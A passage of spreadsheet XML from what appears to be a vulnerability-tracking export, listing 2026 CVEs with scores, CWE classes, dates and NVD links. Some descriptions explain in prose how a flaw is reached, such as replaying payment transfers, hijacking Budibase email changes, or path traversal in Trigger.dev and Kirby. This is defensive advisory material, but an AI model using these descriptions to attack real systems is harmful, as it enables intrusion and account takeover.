          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t>
        </is>
      </c>
    </row>
    <row r="1764">
      <c r="A1764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72961</t>
        </is>
      </c>
      <c r="C1764" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1764" s="5" t="inlineStr"/>
      <c r="F1764" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1764" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1764" s="5" t="inlineStr"/>
      <c r="I1764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1764" s="5" t="inlineStr"/>
      <c r="K1764" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1764" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t>
        </is>
      </c>
    </row>
    <row r="1765">
      <c r="A1765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72962</t>
        </is>
      </c>
      <c r="C1765" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1765" s="5" t="inlineStr"/>
      <c r="F1765" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1765" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1765" s="5" t="inlineStr"/>
      <c r="I1765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1765" s="5" t="inlineStr"/>
      <c r="K1765" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1765" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t>
        </is>
      </c>
    </row>
    <row r="1766">
      <c r="A1766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73136</t>
        </is>
      </c>
      <c r="C1766" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1766" s="5" t="inlineStr"/>
      <c r="F1766" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1766" s="5" t="inlineStr"/>
      <c r="H1766" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I1766" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1766" s="5" t="inlineStr"/>
      <c r="K1766" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L1766" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in ZenHive mpp allows an unauthenticated third party to obtain paid resources by replaying a transfer settled by an unrelated payer.
MPP.Methods.Tempo normally binds a settled TIP-20 TransferWithMemo to the specific challenge under verification through an attribution nonce carried in the memo. When a static "memo" is configured in method_config, check_matched_memo_binding/3 returns the match unconditionally and that binding is skipped, leaving only token, recipient, amount and the static memo value to match on. The static memo is echoed in every unauthenticated 402 response and Tempo transfers are public, so an attacker can take any matching transfer paid by a legitimate customer, request a fresh challenge for the same route, and present that transaction hash as a type="hash" credential. The hash path performs no sender or signature check tying the presenter to the wallet that broadcast the transfer.
This issue affects mpp: from 0.6.1 before 0.6.4.</t>
        </is>
      </c>
      <c r="M1766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73136</t>
        </is>
      </c>
    </row>
    <row r="1767">
      <c r="A1767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73214</t>
        </is>
      </c>
      <c r="C1767" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1767" s="5" t="inlineStr"/>
      <c r="F1767" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1767" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1767" s="5" t="inlineStr"/>
      <c r="I1767" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1767" s="5" t="inlineStr"/>
      <c r="K1767" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1767" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.16.0, dtls_server_input_handler() and create_new_connected_udp_socket() in src/apps/relay/dtls_listener.c retain OpenSSL dtls1_reassemble_fragment() state for a 35-byte fragmented ClientHello declaring a 650,000-byte handshake before cookie validation, allowing an unauthenticated remote sender using fresh UDP tuples to exhaust memory without TURN credentials, a completed handshake, a valid cookie, or source spoofing. This issue is fixed in version 4.16.0.</t>
        </is>
      </c>
      <c r="M1767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73214</t>
        </is>
      </c>
    </row>
    <row r="1768">
      <c r="A1768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73303</t>
        </is>
      </c>
      <c r="C1768" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1768" s="5" t="inlineStr"/>
      <c r="F1768" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1768" s="5" t="inlineStr"/>
      <c r="H1768" s="5" t="inlineStr"/>
      <c r="I1768" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1768" s="5" t="inlineStr"/>
      <c r="K1768" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1768" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, POST /api/v2/email on account.budibase.app accepted a client-controlled accountId without binding it to the authenticated session, while checking only currentEmail. An authenticated attacker who obtains a victim account identifier can start the email-change workflow for the victim, receive and submit the verification code through POST /api/v2/email/verification, move the victim email to an attacker-controlled address, and complete a password reset as the victim. This issue is fixed in version 3.40.0.</t>
        </is>
      </c>
      <c r="M1768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73303</t>
        </is>
      </c>
    </row>
    <row r="1769">
      <c r="A1769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73310</t>
        </is>
      </c>
      <c r="C1769" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1769" s="5" t="inlineStr"/>
      <c r="F1769" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1769" s="5" t="inlineStr"/>
      <c r="H1769" s="5" t="inlineStr"/>
      <c r="I1769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1769" s="5" t="inlineStr"/>
      <c r="K1769" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1769" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authorization flaw in the OAuth2 token endpoint that allows attackers controlling any allowlisted redirect URI to bypass redirect URI binding by submitting a different allowlisted URI than the one recorded at authorization time. Attackers can exchange an intercepted authorization code using a mismatched redirect URI to steal OAuth2 tokens from intercepted authorization flows.</t>
        </is>
      </c>
      <c r="M1769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t>
        </is>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73658</t>
        </is>
      </c>
      <c r="C1770" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1770" s="5" t="inlineStr"/>
      <c r="F1770" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1770" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1770" s="5" t="inlineStr"/>
      <c r="I1770" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1770" s="5" t="inlineStr"/>
      <c r="K1770" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22, CWE-862</t>
        </is>
      </c>
      <c r="L1770" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev is a platform for building and deploying fully managed AI agents and workflows. From 4.4.2 until 4.5.0-rc.5, Aws4FetchClient.buildUrl() and Aws4FetchClient.presign() in apps/webapp/app/v3/objectStoreClient.server.ts assign user-controlled packet keys to URL.pathname, while apps/webapp/app/routes/api.v1.packets.$.ts accepts params["*"] without rejecting dot segments and uses findResource: async () =&gt; 1 without per-resource ownership validation. WHATWG path normalization collapses .. segments before signing, allowing a caller with a valid environment API key to obtain presigned URLs for another tenant's object-store keys and read or overwrite task payloads. This issue is fixed in version 4.5.0-rc.5.</t>
        </is>
      </c>
      <c r="M1770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73658</t>
        </is>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73666</t>
        </is>
      </c>
      <c r="C1771" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1771" s="5" t="inlineStr"/>
      <c r="F1771" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1771" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1771" s="5" t="inlineStr"/>
      <c r="I1771" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1771" s="5" t="inlineStr"/>
      <c r="K1771" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1771" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a developer platform for Kubernetes. Prior to 1.0.4, 1.1.4, and 1.2.1, the OpenChoreo Backstage backend hardcoded backend.auth.dangerouslyDisableDefaultAuthPolicy and auth.providers.guest.dangerouslyAllowOutsideDevelopment to true, exposing /api/* without authentication and allowing unauthenticated catalog reads, scaffolder log reads, and catalog location creation or deletion. This issue is fixed in versions 1.0.4, 1.1.4, and 1.2.1.</t>
        </is>
      </c>
      <c r="M1771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73666</t>
        </is>
      </c>
    </row>
    <row r="1772">
      <c r="A1772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74907</t>
        </is>
      </c>
      <c r="C1772" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1772" s="5" t="inlineStr"/>
      <c r="F1772" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1772" s="5" t="inlineStr"/>
      <c r="H1772" s="5" t="inlineStr"/>
      <c r="I1772" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1772" s="5" t="inlineStr"/>
      <c r="K1772" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1772" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains a path traversal vulnerability in the static asset server within index.php that uses string prefix matching instead of directory-boundary validation. Unauthenticated attackers can access files in sibling directories by exploiting directory names that extend the base path string, such as requesting assets-secret when assets is the configured base.</t>
        </is>
      </c>
      <c r="M1772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74907</t>
        </is>
      </c>
    </row>
    <row r="1773">
      <c r="A1773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75594</t>
        </is>
      </c>
      <c r="C1773" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1773" s="5" t="inlineStr"/>
      <c r="F1773" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1773" s="5" t="inlineStr">
        <is>
          <t>apache, nginx</t>
        </is>
      </c>
      <c r="H1773" s="5" t="inlineStr"/>
      <c r="I1773" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1773" s="5" t="inlineStr"/>
      <c r="K1773" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1773" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. Prior to 4.9.5 and 5.5.2, depending on the release line, Kirby's media handler in src/Cms/Media.php allowed Kirby\Cms\Media::thumb() to append a path-bearing filename to a validated parent media directory. On nginx, PHP's built-in server, or Apache with AllowEncodedSlashes enabled, a remote attacker could submit encoded slash characters such as %2f in the filename and traverse outside the parent's media directory. Differences between responses for existing and nonexistent thumbnail configurations disclosed whether an arbitrary .json file existed, and a .json file containing a valid filename key could cause the referenced image to be returned and the job file to be deleted. The related file::version path in src/Filesystem/Asset.php also accepted ../ sequences outside the intended index root. This issue is fixed in versions 4.9.5 and 5.5.2.</t>
        </is>
      </c>
      <c r="M1773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75594</t>
        </is>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76191</t>
        </is>
      </c>
      <c r="C1774" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1774" s="5" t="inlineStr"/>
      <c r="F1774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1774" s="5" t="inlineStr"/>
      <c r="H1774" s="5" t="inlineStr"/>
      <c r="I1774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1774" s="5" t="inlineStr"/>
      <c r="K1774" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1774" s="5" t="inlineStr">
        <is>
          <t>Animate is affected by an Improper Control of Generation of Code ('Code Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t>
        </is>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76202</t>
        </is>
      </c>
      <c r="C1775" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1775" s="5" t="inlineStr"/>
      <c r="F1775" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1775" s="5" t="inlineStr"/>
      <c r="H1775" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1775" s="5" t="inlineStr"/>
      <c r="K1775" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1775"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M1775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t>
        </is>
      </c>
    </row>
    <row r="1776">
      <c r="A1776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77348</t>
        </is>
      </c>
      <c r="C1776" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1776" s="5" t="inlineStr"/>
      <c r="F1776" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1776" s="5" t="inlineStr"/>
      <c r="H1776" s="5" t="inlineStr"/>
      <c r="I1776" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1776" s="5" t="inlineStr"/>
      <c r="K1776" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L1776" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, the fix for CVE-2026-33407 (GHSA-hhjq-82f8-m6rc, "SSRF via HTTP Proxy Environment Variable") hardened endpoints/logos/search.php by disabling cURL proxying (CURLOPT_PROXY = '' + CURLOPT_NOPROXY = '*'). However, Wallos ships a second, near-identical, unauthenticated logo-image search endpoint — endpoints/payments/search.php — that was not given the same hardening. It still passes the HTTP_PROXY/HTTPS_PROXY environment variable straight into CURLOPT_PROXY. This issue has been patched in version 5.0.0.</t>
        </is>
      </c>
      <c r="M1776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77348</t>
        </is>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77358</t>
        </is>
      </c>
      <c r="C1777" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1777" s="5" t="inlineStr"/>
      <c r="F1777" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1777" s="5" t="inlineStr"/>
      <c r="H1777" s="5" t="inlineStr"/>
      <c r="I1777" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1777" s="5" t="inlineStr"/>
      <c r="K1777" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1777" s="5" t="inlineStr">
        <is>
          <t>cpp-httplib is a C++ header-only HTTP/HTTPS library. In versions 0.33.0 through 0.50.0, the TLS-enabled WebSocket client frees the TLS session before closing the WebSocket that still uses it, producing a use-after-free. In WebSocketClient::shutdown_and_close the SSL object is freed and the pointer cleared, but the subsequent WebSocket close still sends a close frame through the SSL socket stream, which holds a raw copy of the now-dangling session pointer and reads from and writes to the freed memory. The same freed-then-used ordering is reachable through the client's destructor and its connect path, so ordinary teardown of a secure WebSocket connection triggers the defect. This issue is fixed in version 0.50.1.</t>
        </is>
      </c>
      <c r="M1777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77358</t>
        </is>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77634</t>
        </is>
      </c>
      <c r="C1778" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1778" s="5" t="inlineStr"/>
      <c r="F1778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1778" s="5" t="inlineStr"/>
      <c r="H1778" s="5" t="inlineStr"/>
      <c r="I1778" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1778" s="5" t="inlineStr"/>
      <c r="K1778" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L1778" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to versions 4.5.12, 4.6.5, 5.1.8, 5.2.14, and 5.3.7 on their respective release lines, custom mail headers added with Message::setHeaders() or Message::addHeaders() do not have CRLF bytes removed, allowing header injection when user-controlled data is used in message headers. This issue is fixed in versions 4.5.12, 4.6.5, 5.1.8, 5.2.14, and 5.3.7.</t>
        </is>
      </c>
      <c r="M1778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77634</t>
        </is>
      </c>
    </row>
    <row r="1779">
      <c r="A1779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77641</t>
        </is>
      </c>
      <c r="C1779" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1779" s="5" t="inlineStr"/>
      <c r="F1779" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1779" s="5" t="inlineStr"/>
      <c r="H1779" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="I1779" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1779" s="5" t="inlineStr"/>
      <c r="K1779" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L1779" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to a NULL write after free when sending a CONFLUX_SWITCH cell fails. The return value of relay_send_command_from_edge() was   ignored, so a send failure (which calls circuit_mark_for_close()  and removes the leg via cfx_del_leg()) would go undetected, causing the caller to write to the now-freed current leg and resulting in a crash. This is TROVE-2026-017.</t>
        </is>
      </c>
      <c r="M1779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77641</t>
        </is>
      </c>
    </row>
    <row r="1780">
      <c r="A1780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77822</t>
        </is>
      </c>
      <c r="C1780" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1780" s="5" t="inlineStr"/>
      <c r="F1780" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1780" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1780" s="5" t="inlineStr"/>
      <c r="I1780" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1780" s="5" t="inlineStr"/>
      <c r="K1780" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1780" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway could allow a remote authenticated attacker to obtain sensitive information due to server-side request forgery via DNS rebinding.</t>
        </is>
      </c>
      <c r="M1780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77822</t>
        </is>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77968</t>
        </is>
      </c>
      <c r="C1781" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1781" s="5" t="inlineStr"/>
      <c r="F1781" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1781" s="5" t="inlineStr"/>
      <c r="H1781" s="5" t="inlineStr"/>
      <c r="I1781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1781" s="5" t="inlineStr"/>
      <c r="K1781" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1781" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator's ClusterRole grants secrets: [create, get, list, update, watch] across all namespaces. While the operator uses a controller-runtime label-selector cache as a memory optimization, the ServiceAccount token authorizes read access to every Secret in the cluster. The operator also bypasses the cache via direct API calls. Compromise of the operator pod would yield read access to every Secret in the cluster, including bootstrap tokens, cloud credentials, and other operators' secrets.</t>
        </is>
      </c>
      <c r="M1781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t>
        </is>
      </c>
    </row>
    <row r="1782">
      <c r="A1782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78491</t>
        </is>
      </c>
      <c r="C1782" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1782" s="5" t="inlineStr"/>
      <c r="F1782" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1782" s="5" t="inlineStr"/>
      <c r="H1782" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I1782" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1782" s="5" t="inlineStr"/>
      <c r="K1782" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L178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1782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78491</t>
        </is>
      </c>
    </row>
    <row r="1783">
      <c r="A1783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79645</t>
        </is>
      </c>
      <c r="C1783" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1783" s="5" t="inlineStr"/>
      <c r="F1783" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1783" s="5" t="inlineStr"/>
      <c r="H1783" s="5" t="inlineStr"/>
      <c r="I1783" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1783" s="5" t="inlineStr"/>
      <c r="K1783" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1783"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M1783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79645</t>
        </is>
      </c>
    </row>
    <row r="1784">
      <c r="A1784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="C1784" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1784" s="5" t="inlineStr"/>
      <c r="F1784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1784" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1784" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="I1784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1784" s="5" t="inlineStr"/>
      <c r="K1784" s="5" t="inlineStr">
        <is>
